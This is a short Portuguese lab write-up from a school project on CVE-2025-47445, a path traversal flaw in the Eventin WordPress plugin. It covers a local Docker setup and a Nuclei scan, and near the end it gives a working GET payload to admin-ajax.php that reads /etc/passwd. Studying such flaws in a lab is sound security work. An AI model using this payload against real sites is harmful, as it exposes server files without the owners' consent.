
Prova de conceito de exploit para CVE-2025-47445, uma vulnerabilidade de path traversal no plugin Eventin para WordPress. Inclui instruções de configuração para um ambiente Docker local e etapas manuais de exploração.
Esta prova de conceito é baseada em um trabalho escolar em que queríamos encontrar um plugin Wordpress vulnerável e testar essa vulnerabilidade em um ambiente controlado local.
| Informações | |
|---|---|
| Plugin Wordpress: | Wordpress Eventin |
| Versão do plugin: | 4.0.26 (ou mais antiga) |
| Informações do CVE: | Project Discovery - Biblioteca de vulnerabilidades |
| CVEdetails.com | |
| Ferramentas de interesse: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
O Worfence Docker WordPress Research Lab vem com dois ambientes diferentes, um com uma versão mais antiga do PHP; optaremos pelo mais novo.
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
Depois disso, configurei a página Wordpress através do localhost:1337. Baixei o plugin Eventin, especificamente a versão 4.0.26, da loja de plugins, e o instalei e ativei através da interface do Wordpress.
Agora tudo deve estar pronto.
Quero ver se o Nuclei consegue encontrar o CVE que procuro, então executo uma instância através de um contêiner Docker temporário.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Tentei executar o Nuclei várias vezes e obtive resultados diferentes, não sei por quê. Mas, eventualmente, ele encontra o CVE e algumas outras coisas que eu não estava procurando especificamente.

Para ver se consigo acessar o arquivo /etc/passwd, basta inserir o seguinte payload na minha requisição GET.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
E foi um sucesso.

Isso foi feito para fins educacionais.
Certifique-se de atualizar todo o seu software. Novos CVEs são encontrados todos os dias.